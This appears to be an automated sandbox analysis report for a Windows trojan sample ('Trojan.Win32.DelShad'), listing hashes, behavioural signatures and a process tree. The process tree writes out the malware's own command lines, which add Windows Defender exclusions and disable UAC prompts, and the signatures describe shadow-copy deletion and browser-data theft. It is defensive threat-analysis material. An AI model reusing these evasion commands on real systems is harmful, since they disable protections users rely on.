Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
14-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
Trojan.Win32.DelShad.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Trojan.Win32.DelShad.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Trojan.Win32.DelShad.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
Trojan.Win32.DelShad.exe
Resource
win11-20241007-en
General
-
Target
Trojan.Win32.DelShad.exe
-
Size
30.2MB
-
MD5
52cc1d2fbc403848c18f3c95dd63d727
-
SHA1
9c5067b86ffc4ab6908aea7d9adf0b82353db3af
-
SHA256
a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
-
SHA512
7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
-
SSDEEP
393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Key created \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\dIsablEEnhAncEdnOtiFiCatiOns = "1" reg.exe -
Processes:
reg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" reg.exe -
Processes:
rEg.EXErEG.EXErEg.EXEdescription ioc Process Key created \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0" rEg.EXE Key created \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs rEG.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0" rEG.EXE Key created \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0" rEg.EXE -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Windows11InstaIIation.sCr -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Trojan.Win32.DelShad.tmpWScript.exeWindows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation Trojan.Win32.DelShad.tmp Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation Windows11InstaIIation.sCr -
Drops startup file 1 IoCs
Processes:
Trojan.Win32.DelShad.tmpdescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk Trojan.Win32.DelShad.tmp -
Executes dropped EXE 17 IoCs
Processes:
Trojan.Win32.DelShad.tmpTrojan.Win32.DelShad.tmppik.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeWindows11InstaIIation.scrWindows11InstaIIation.sCrpid Process 4892 Trojan.Win32.DelShad.tmp 804 Trojan.Win32.DelShad.tmp 4760 pik.exe 3152 rp.exe 3596 rp.exe 772 rp.exe 3716 rp.exe 4660 rp.exe 304 rp.exe 1944 rp.exe 4768 rp.exe 3780 rp.exe 1644 rp.exe 4848 rp.exe 2248 rp.exe 1276 Windows11InstaIIation.scr 1652 Windows11InstaIIation.sCr -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid Process 1664 icacls.exe 3424 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ipINFO.io -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Windows11InstaIIation.scrdescription pid Process procid_target PID 1276 set thread context of 1652 1276 Windows11InstaIIation.scr 188 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Trojan.Win32.DelShad.tmptaskkill.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeTrojan.Win32.DelShad.tmpcmd.exerp.exeWindows11InstaIIation.scrcurl.exepowershell.exeTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.execmd.execmd.exeWindows11InstaIIation.sCrdescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.sCr -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
find.exefind.exepid Process 3132 find.exe 3128 find.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Windows11InstaIIation.sCr -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion Windows11InstaIIation.sCr Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion Windows11InstaIIation.sCr -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 3848 vssadmin.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 2656 taskkill.exe -
Modifies data under HKEY_USERS 20 IoCs
Processes:
rp.exerp.exerp.exerp.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Trojan.Win32.DelShad.tmpWMIC.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 804 Trojan.Win32.DelShad.tmp 804 Trojan.Win32.DelShad.tmp 1676 WMIC.exe 1676 WMIC.exe 1676 WMIC.exe 1676 WMIC.exe 3152 rp.exe 3152 rp.exe 3152 rp.exe 3152 rp.exe 772 rp.exe 772 rp.exe 3596 rp.exe 3596 rp.exe 772 rp.exe 772 rp.exe 3596 rp.exe 3596 rp.exe 3716 rp.exe 3716 rp.exe 3716 rp.exe 3716 rp.exe 304 rp.exe 304 rp.exe 304 rp.exe 304 rp.exe 4768 rp.exe 4768 rp.exe 4768 rp.exe 4768 rp.exe 3780 rp.exe 3780 rp.exe 3780 rp.exe 3780 rp.exe 4848 rp.exe 4848 rp.exe 4848 rp.exe 4848 rp.exe 3568 WMIC.exe 3568 WMIC.exe 3568 WMIC.exe 3568 WMIC.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 2444 powershell.exe 2444 powershell.exe 2944 powershell.exe 2944 powershell.exe 3700 powershell.exe 3700 powershell.exe 4660 powershell.exe 4660 powershell.exe 5060 powershell.exe 5060 powershell.exe 3132 powershell.exe 3132 powershell.exe 2236 powershell.exe 2236 powershell.exe 944 powershell.exe 944 powershell.exe 2456 powershell.exe 2456 powershell.exe 4160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exepik.exevssvc.exeWMIC.exemsiexec.exerp.exerp.exerp.exerp.exerp.exedescription pid Process Token: SeDebugPrivilege 2656 taskkill.exe Token: SeDebugPrivilege 4760 pik.exe Token: SeBackupPrivilege 1376 vssvc.exe Token: SeRestorePrivilege 1376 vssvc.exe Token: SeAuditPrivilege 1376 vssvc.exe Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: 36 1676 WMIC.exe Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: 36 1676 WMIC.exe Token: SeSecurityPrivilege 4420 msiexec.exe Token: SeDebugPrivilege 3152 rp.exe Token: SeAssignPrimaryTokenPrivilege 3152 rp.exe Token: SeIncreaseQuotaPrivilege 3152 rp.exe Token: 0 3152 rp.exe Token: SeDebugPrivilege 3596 rp.exe Token: SeAssignPrimaryTokenPrivilege 3596 rp.exe Token: SeIncreaseQuotaPrivilege 3596 rp.exe Token: SeDebugPrivilege 772 rp.exe Token: SeAssignPrimaryTokenPrivilege 772 rp.exe Token: SeIncreaseQuotaPrivilege 772 rp.exe Token: 0 772 rp.exe Token: SeDebugPrivilege 3716 rp.exe Token: SeAssignPrimaryTokenPrivilege 3716 rp.exe Token: SeIncreaseQuotaPrivilege 3716 rp.exe Token: SeDebugPrivilege 304 rp.exe Token: SeAssignPrimaryTokenPrivilege 304 rp.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Trojan.Win32.DelShad.tmppid Process 804 Trojan.Win32.DelShad.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Windows11InstaIIation.scrpid Process 1276 Windows11InstaIIation.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Trojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpWScript.execmd.exedescription pid Process procid_target PID 2212 wrote to memory of 4892 2212 Trojan.Win32.DelShad.exe 83 PID 2212 wrote to memory of 4892 2212 Trojan.Win32.DelShad.exe 83 PID 2212 wrote to memory of 4892 2212 Trojan.Win32.DelShad.exe 83 PID 4892 wrote to memory of 1396 4892 Trojan.Win32.DelShad.tmp 84 PID 4892 wrote to memory of 1396 4892 Trojan.Win32.DelShad.tmp 84 PID 4892 wrote to memory of 1396 4892 Trojan.Win32.DelShad.tmp 84 PID 1396 wrote to memory of 804 1396 Trojan.Win32.DelShad.exe 85 PID 1396 wrote to memory of 804 1396 Trojan.Win32.DelShad.exe 85 PID 1396 wrote to memory of 804 1396 Trojan.Win32.DelShad.exe 85 PID 804 wrote to memory of 2656 804 Trojan.Win32.DelShad.tmp 86 PID 804 wrote to memory of 2656 804 Trojan.Win32.DelShad.tmp 86 PID 804 wrote to memory of 2656 804 Trojan.Win32.DelShad.tmp 86 PID 804 wrote to memory of 4760 804 Trojan.Win32.DelShad.tmp 89 PID 804 wrote to memory of 4760 804 Trojan.Win32.DelShad.tmp 89 PID 1652 wrote to memory of 2360 1652 WScript.exe 93 PID 1652 wrote to memory of 2360 1652 WScript.exe 93 PID 2360 wrote to memory of 4028 2360 cmd.exe 95 PID 2360 wrote to memory of 4028 2360 cmd.exe 95 PID 2360 wrote to memory of 4108 2360 cmd.exe 96 PID 2360 wrote to memory of 4108 2360 cmd.exe 96 PID 2360 wrote to memory of 3460 2360 cmd.exe 97 PID 2360 wrote to memory of 3460 2360 cmd.exe 97 PID 2360 wrote to memory of 1116 2360 cmd.exe 98 PID 2360 wrote to memory of 1116 2360 cmd.exe 98 PID 2360 wrote to memory of 4400 2360 cmd.exe 99 PID 2360 wrote to memory of 4400 2360 cmd.exe 99 PID 2360 wrote to memory of 3968 2360 cmd.exe 100 PID 2360 wrote to memory of 3968 2360 cmd.exe 100 PID 2360 wrote to memory of 3360 2360 cmd.exe 101 PID 2360 wrote to memory of 3360 2360 cmd.exe 101 PID 2360 wrote to memory of 944 2360 cmd.exe 102 PID 2360 wrote to memory of 944 2360 cmd.exe 102 PID 2360 wrote to memory of 4352 2360 cmd.exe 103 PID 2360 wrote to memory of 4352 2360 cmd.exe 103 PID 2360 wrote to memory of 1500 2360 cmd.exe 104 PID 2360 wrote to memory of 1500 2360 cmd.exe 104 PID 2360 wrote to memory of 1196 2360 cmd.exe 105 PID 2360 wrote to memory of 1196 2360 cmd.exe 105 PID 2360 wrote to memory of 3804 2360 cmd.exe 106 PID 2360 wrote to memory of 3804 2360 cmd.exe 106 PID 2360 wrote to memory of 3800 2360 cmd.exe 107 PID 2360 wrote to memory of 3800 2360 cmd.exe 107 PID 2360 wrote to memory of 4188 2360 cmd.exe 108 PID 2360 wrote to memory of 4188 2360 cmd.exe 108 PID 2360 wrote to memory of 4696 2360 cmd.exe 109 PID 2360 wrote to memory of 4696 2360 cmd.exe 109 PID 2360 wrote to memory of 4380 2360 cmd.exe 110 PID 2360 wrote to memory of 4380 2360 cmd.exe 110 PID 2360 wrote to memory of 3828 2360 cmd.exe 111 PID 2360 wrote to memory of 3828 2360 cmd.exe 111 PID 2360 wrote to memory of 1620 2360 cmd.exe 112 PID 2360 wrote to memory of 1620 2360 cmd.exe 112 PID 2360 wrote to memory of 4540 2360 cmd.exe 113 PID 2360 wrote to memory of 4540 2360 cmd.exe 113 PID 2360 wrote to memory of 4588 2360 cmd.exe 114 PID 2360 wrote to memory of 4588 2360 cmd.exe 114 PID 2360 wrote to memory of 2492 2360 cmd.exe 115 PID 2360 wrote to memory of 2492 2360 cmd.exe 115 PID 2360 wrote to memory of 1928 2360 cmd.exe 116 PID 2360 wrote to memory of 1928 2360 cmd.exe 116 PID 2360 wrote to memory of 3280 2360 cmd.exe 117 PID 2360 wrote to memory of 3280 2360 cmd.exe 117 PID 2360 wrote to memory of 1820 2360 cmd.exe 118 PID 2360 wrote to memory of 1820 2360 cmd.exe 118 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
Processes:
description flow ioc HTTP User-Agent header 17 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp" /SL5="$501BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp" /SL5="$601BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exerp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4660 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F9⤵
- Windows security bypass
PID:844
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exerP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1944 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f9⤵
- Windows security bypass
PID:640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exerP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304 -
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4768 -
